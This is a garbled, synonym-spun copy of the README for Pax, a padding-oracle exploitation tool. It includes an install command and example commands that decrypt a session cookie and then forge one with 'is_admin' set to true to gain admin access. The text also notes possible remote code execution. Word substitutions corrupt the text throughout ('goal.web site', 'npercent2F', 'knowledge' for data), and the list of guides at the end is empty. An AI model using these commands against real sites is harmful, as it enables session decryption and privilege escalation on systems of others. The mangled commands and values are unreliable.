Exploit padding oracles for enjoyable and revenue!
Pax (PAdding oracle eXploiter) is a software for exploiting padding oracles so as to:
- Receive plaintext for a given piece of CBC encrypted knowledge.
- Receive encrypted bytes for a given piece of plaintext, utilizing the unknown encryption algorithm utilized by the oracle.
This can be utilized to reveal encrypted session info, and sometimes to bypass authentication, elevate privileges and to execute code remotely by encrypting customized plaintext and writing it again to the server.
As all the time, this software ought to solely be used on programs you personal and/or have permission to probe!
Set up
Obtain from releases, or set up with Go:
go get -u github.com/liamg/pax/cmd/pax
Instance Utilization
When you discover a suspected oracle, the place the encrypted knowledge is saved inside a cookie named SESS
, you need to use the next:
pax decrypt --url https://goal.web site/profile.php --sample Gw3kg8e3ej4ai9wffnpercent2Fd0uRqKzyaPfM2UFqpercent2F8dWmoW4wnyKZhx07Bgpercent3Dpercent3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffnpercent2Fd0uRqKzyaPfM2UFqpercent2F8dWmoW4wnyKZhx07Bgpercent3Dpercent3D"
This may hopefully provide you with some plaintext, maybe one thing like:
{"user_id": 456, "is_admin": false}
It seems like you would elevate your privileges right here!
You’ll be able to try to take action by first producing your individual encrypted knowledge that the oracle will decrypt again to some sneaky plaintext:
pax encrypt --url https://goal.web site/profile.php --sample Gw3kg8e3ej4ai9wffnpercent2Fd0uRqKzyaPfM2UFqpercent2F8dWmoW4wnyKZhx07Bgpercent3Dpercent3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffnpercent2Fd0uRqKzyaPfM2UFqpercent2F8dWmoW4wnyKZhx07Bgpercent3Dpercent3D" --plain-text '{"user_id": 456, "is_admin": true}'
This may spit out one other base64 encoded set of encrypted knowledge, maybe one thing like:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Now you may open your browser and set the worth of the SESS
cookie to the above worth. Loading the unique oracle web page, it is best to now see you’re elevated to admin degree.
How does this work?
The next are nice guides on how this assault works: